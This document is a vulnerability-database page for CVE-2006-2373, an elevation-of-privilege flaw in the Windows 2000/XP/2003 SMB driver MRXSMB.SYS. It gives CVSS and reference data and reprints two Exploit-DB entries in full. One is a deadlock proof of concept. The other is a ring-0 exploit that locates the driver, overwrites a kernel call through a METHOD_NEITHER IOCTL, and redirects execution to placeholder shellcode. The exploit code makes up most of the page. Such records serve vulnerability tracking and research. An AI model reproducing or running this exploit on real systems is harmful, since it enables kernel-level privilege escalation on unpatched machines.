CVE-2006-2373 : Detail

CVE-2006-2373

A01 - Broken Access Control
18.21% V4
Attack vector: Network
Published: 2006-06-13 17h00 +00:00
Last modified: 2018-10-12 17h57 +00:00

CVE Description

The Server Message Block (SMB) driver (MRXSMB.SYS) in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 and earlier allows local users to execute arbitrary code by calling the MrxSmbCscIoctlOpenForCopyChunk function with the METHOD_NEITHER method flag and an arbitrary address, possibly for kernel memory, aka the "SMB Driver Elevation of Privilege Vulnerability."

CVE Information

Related Weaknesses

CWE-ID: CWE-264
Weakness Name: Category: Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

CVSS V2: score 10, vector AV:N/AC:L/Au:N/C:C/I:C/A:C, source nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 1910

Publication date : 2006-06-13 22h00 +00:00
Author : Ruben Santamarta
EDB Verified : Yes

////////////////////////////////////////////////////////////////////////////////
///////// MRXSMB.SYS NtClose DEADLOCK exploit///////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// November 19, 2005
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// ONLY FOR EDUCATION PURPOSES
////////////////////////////////////////////////////////////////////////////////
// Rubén Santamarta
// ruben (at) reversemode (dot) com
// http://www.reversemode.com
////////////////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* malloc, exit */

#define MAGIC_IOCTL 0x141047

/* Print the last Win32 error in a message box and abort. */
VOID ShowError()
{
    LPVOID lpMsgBuf;
    FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
                  NULL, GetLastError(),
                  MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                  (LPTSTR)&lpMsgBuf, 0, NULL);
    MessageBoxA(0, (LPTSTR)lpMsgBuf, "Error", 0);
    exit(1);
}

/* Worker thread that keeps running after the main thread has blocked. */
VOID IamAlive()
{
    DWORD i;
    for (i = 0; i < 0x1000; i++) {
        Sleep(1000);
        printf("\rI am a Thread and I am alive [%x]", i);
    }
}

/* Send the IOCTL to \\.\shadow with the device handle itself in the
   output buffer; the driver's NtClose on that handle deadlocks the caller. */
VOID KillMySelf()
{
    DWORD junk;
    DWORD *OutBuff;
    HANDLE hDevice;

    hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE,
                         FILE_SHARE_READ | FILE_SHARE_WRITE,
                         NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) ShowError();

    OutBuff = (DWORD *)malloc(0x18);
    if (!OutBuff) ShowError();
    OutBuff[3] = (DWORD)hDevice;

    DeviceIoControl(hDevice, MAGIC_IOCTL, 0, 0, OutBuff, 0x18,
                    &junk, (LPOVERLAPPED)NULL);
    // MAIN THREAD ENDING.
}

int main(int argc, char *argv[])
{
    LPTHREAD_START_ROUTINE GoodThread;
    DWORD dwThreadId;

    GoodThread = (LPTHREAD_START_ROUTINE)IamAlive;

    printf("-=[MRXSMB.SYS NtClose Vulnerability POC]=-\n");
    printf("\t(Only for educational purposes)\n");
    printf("..http://www.reversemode.com..\n\n");
    printf("Launching Thread ...");

    // PUT YOUR "GOOD" OR "BAD" CODE HERE
    // e.g GoodThread
    CreateThread(NULL, 0, GoodThread, 0, 0, &dwThreadId);
    printf("Done\n");
    printf("I am going to disappear, but I will be with you forever\n");
    printf("(..)\n\n");

    KillMySelf();   // Immortal mode "on" ;)
    return (1);
}

// milw0rm.com [2006-06-14]
Exploit Database EDB-ID : 1911

Publication date : 2006-06-13 22h00 +00:00
Author : Ruben Santamarta
EDB Verified : Yes

///////////////////////////////////////////////////////////////////////////////////////
// Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
// Tested on XP SP2 && 2K SP4
// Disable ReadOnly Memory protection
// HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\EnforceWriteProtection = 0
// -----------------------------------------------------------------------------------
// ONLY FOR EDUCATIONAL PURPOSES.
// -----------------------------------------------------------------------------------
// Rubén Santamarta.
// www.reversemode.com
// -----------------------------------------------------------------------------------
// OVERVIEW
// -----------------------------------------------------------------------------------
// There are 3 possible values to change in order to adjust the exploit to other versions.
//
// # XPSP2 (XP Service Pack 2)
// This variable is equal to the File offset of the Call that we are modifying minus 0xC
//
//. #XPSP2 => 3D88020000   cmp eax,000000288
//.          770B         ja  .000064BBE   --
//.          50           push eax
//.          51           push ecx
//.          E812E2FFFF   call .000062DCC  -- MODIFIED CALL --
// -----------------------------------------------------------------------------------
// #W2KSP4 (Windows 2000 Service Pack 4)
// The same method previously explained, but for Windows 2000 Service Pack 4.
// -----------------------------------------------------------------------------------
// $OffWord
// This variable is defined in the CalcJump() function.
//   E812E2FFFF   call .000062DCC  -- MODIFIED CALL --
// The exploit calculates the relative jump automatically, but we need to provide it
// the 2 bytes following the Call opcode (0xE8). For example, as we can see, to test on XP
// OffWord will be equal to 0xE212.
//////////////////////////////////////////////////////////////////////////////////////

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>   /* exit */
#include <string.h>   /* strncmp, memcpy */

#define XPSP2       0x54BAC
#define W2KSP4      0x50ADD
#define MAGIC_IOCTL 0x141043

typedef BOOL  (WINAPI *PENUMDEVICES)(LPVOID *, DWORD, LPDWORD);
typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase, LPTSTR lpBaseName, DWORD nSize);

/* Print the last Win32 error in a message box and abort. */
VOID ShowError()
{
    LPVOID lpMsgBuf;
    FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
                  NULL, GetLastError(),
                  MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
                  (LPTSTR)&lpMsgBuf, 0, NULL);
    MessageBoxA(0, (LPTSTR)lpMsgBuf, "Error", 0);
    exit(1);
}

/* Search for a counter value whose negated form, combined with OffWord,
   turns the patched call into a relative jump landing in user space
   (0x0E000000-0x0F000000). Returns the page-aligned base to allocate. */
DWORD CalcJump(DWORD BaseMRX, BOOL InXP, DWORD *hValue, DWORD *ShellAddr)
{
    DWORD SumTemp;
    DWORD IniAddress = 0;
    DWORD i;
    DWORD sumAux;
    DWORD addTemp = 0;
    DWORD OffWord;

    if (InXP) {
        SumTemp = BaseMRX + XPSP2 + 0xE;
        OffWord = 0xE212;
    } else {
        SumTemp = BaseMRX + W2KSP4 + 0xE;
        OffWord = 0xa971;
    }

    for (i = 0x4c; i < 0xDDDC; i = i + 4) {
        sumAux  = ~((i * 0x10000) + OffWord);
        addTemp = SumTemp - sumAux;
        if (addTemp > 0xE000000 && addTemp < 0xF000000) {
            IniAddress = addTemp & 0xFFFFF000;
            *hValue    = i - 4;
            *ShellAddr = addTemp;
            break;
        }
    }

    printf("\nINFORMATION \n");
    printf("-----------------------------------------------------\n");
    printf("Patched Driver Call pointing to \t [0x%p]\n", addTemp);
    return (IniAddress);
}

int main(int argc, char *argv[])
{
    PENUMDEVICES pEnumDeviceDrivers;
    PGETDEVNAME  pGetDeviceDriverBaseName;
    LPVOID arrMods[200], addEx;
    DWORD cb, i, devNum, dwTemp, hValue, Ring0Addr, junk, ShellAddr, BaseMRX = 0;
    DWORD *OutBuff, *InBuff;
    HANDLE hDevice;
    BOOL InXP;
    CHAR baseName[255];
    CONST CHAR Ring0ShellCode[] = "\xCC"; // "PUT YOUR RING0 CODE HERE :)"

    if (argc < 2) {
        printf("\nMRXSMB.SYS RING0 Exploit\n");
        printf("--- Ruben Santamarta ---\n");
        printf("Tested on XPSP2 & W2KSP4\n");
        printf("\nusage> exploit.exe <XP> or <2K>\n");
        exit(1);
    }

    if (strncmp(argv[1], "XP", 2) == 0)
        InXP = TRUE;
    else
        InXP = FALSE;

    pEnumDeviceDrivers = (PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
                                                      "EnumDeviceDrivers");
    pGetDeviceDriverBaseName = (PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
                                                           "GetDeviceDriverBaseNameA");
    pEnumDeviceDrivers(arrMods, sizeof(arrMods), &cb);
    devNum = cb / sizeof(LPVOID);

    /* Locate the load address of mrxsmb.sys among the loaded drivers. */
    printf("\nSearching Mrxsmb.sys Base Address...");
    for (i = 0; i < devNum; i++) {
        pGetDeviceDriverBaseName(arrMods[i], baseName, 254);
        if ((strncmp(baseName, "mrxsmb", 6) == 0)) {
            printf("[%x] Found!\n", arrMods[i]);
            BaseMRX = (DWORD)arrMods[i];
        }
    }
    if (!BaseMRX) {
        printf("Not Found\nExiting\n\n");
        exit(1);
    }

    addEx   = (LPVOID)CalcJump(BaseMRX, InXP, &hValue, &ShellAddr);
    OutBuff = (DWORD *)VirtualAlloc((LPVOID)addEx, 0xF000,
                                    MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!OutBuff) ShowError();
    printf("F000h bytes allocated at \t\t [0x%p]\n", addEx);
    printf("Value needed \t\t\t [0x%p]\n", hValue + 4);
    InBuff = OutBuff;

    printf("Checking Shadow Device...");
    hDevice = CreateFile("\\\\.\\shadow", FILE_EXECUTE,
                         FILE_SHARE_READ | FILE_SHARE_WRITE,
                         NULL, OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) ShowError();
    printf("[OK]\n");

    /* Drive the driver's counter up to the value computed by CalcJump(). */
    printf("Querying Device...\n");
    while (OutBuff[3] < hValue) {
        DeviceIoControl(hDevice,        // "\\.\shadow"
                        MAGIC_IOCTL,    // Privileged IOCTL
                        InBuff, 2,      // InBuffer, InBufferSize
                        OutBuff, 0x18,  // OutBuffer, OutBufferSize
                        &junk,          // bytes returned
                        (LPOVERLAPPED)NULL);
        printf("\r\t[->]VALUES: (%x)", OutBuff[3]);
    }

    if (InXP)
        Ring0Addr = BaseMRX + XPSP2;
    else
        Ring0Addr = BaseMRX + W2KSP4;

    /* METHOD_NEITHER output pointer is a kernel address: the driver writes
       its counter over the call instruction inside mrxsmb.sys. */
    printf("Overwriting Driver Call at[%x]...", Ring0Addr);
    DeviceIoControl(hDevice,                 // "\\.\shadow"
                    MAGIC_IOCTL,             // Privileged IOCTL
                    InBuff, 2,               // InBuffer, InBufferSize
                    (LPVOID)Ring0Addr, 0x18, // OutBuffer, OutBufferSize
                    &junk,                   // bytes returned
                    (LPOVERLAPPED)NULL);
    printf("[OK]\n");

    for (i = 1; i < 0x3C00; i++)
        OutBuff[i] = 0x90909090;
    memcpy((LPVOID *)ShellAddr, (LPVOID *)Ring0ShellCode, sizeof(Ring0ShellCode));

    printf("Sending IOCTL to execute the ShellCode\n");
    DeviceIoControl(hDevice,        // "\\.\shadow"
                    MAGIC_IOCTL,    // Privileged IOCTL
                    InBuff, 2,      // InBuffer, InBufferSize
                    OutBuff, 0x18,  // OutBuffer, OutBufferSize
                    &junk,          // bytes returned
                    (LPOVERLAPPED)NULL);

    dwTemp = CloseHandle(hDevice);
    if (!dwTemp) ShowError();
    dwTemp = VirtualFree(OutBuff, 0xf000, MEM_DECOMMIT);
    if (!dwTemp) ShowError();
    return (1);
}

// milw0rm.com [2006-06-14]

Products Mentioned

Configuration 0

Microsoft>>Windows_2000 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

References

http://securitytracker.com/id?1016288
Tags : vdb-entry, x_refsource_SECTRACK
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=408
Tags : third-party-advisory, x_refsource_IDEFENSE
http://www.vupen.com/english/advisories/2006/2327
Tags : vdb-entry, x_refsource_VUPEN
http://www.osvdb.org/26440
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/18356
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/20635
Tags : third-party-advisory, x_refsource_SECUNIA